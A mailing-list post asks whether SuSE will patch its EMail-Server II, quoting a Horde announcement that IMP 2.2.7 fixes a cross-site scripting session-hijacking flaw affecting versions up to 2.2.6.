I found the following message on Bugtraq. Is suse working on a fix for Suse EMail-Server II? The patch on the update-server is still 2.2.6. Martin "Brent J. Nordquist" wrote:
The Horde team announces the availability of IMP 2.2.7, which fixes a potential session hijacking vulnerability using a cross-site scripting (CSS) attack. We recommend that all sites running IMP 2.2.x upgrade to this version.
The Horde Project would like to thank João Pedro Gonçalves from the Phibernet Information Network
for discovering this problem and alerting us. From his description: - It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper.
- After hijacking the cookies, the attacker can use the session and read the victim's mail.
- All stable imp webmail versions, up to 2.2.6 including are vulnerable, the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this vulnerability.
This release also has a new Chinese (Simplified) translation.
-- The three golden rules to ensure computer security are: Do not own a computer; do not power it on; and do not use it (Robert (Bob) T.Morris) GiS - Gesellschaft fuer integrierte Systemplanung mbH Martin Sckopke Tel. +49-6201-503-74 Junkersstr. 2 Fax +49-6201-503-66 D-69469 Weinheim m.sckopke@gis-systemhaus.de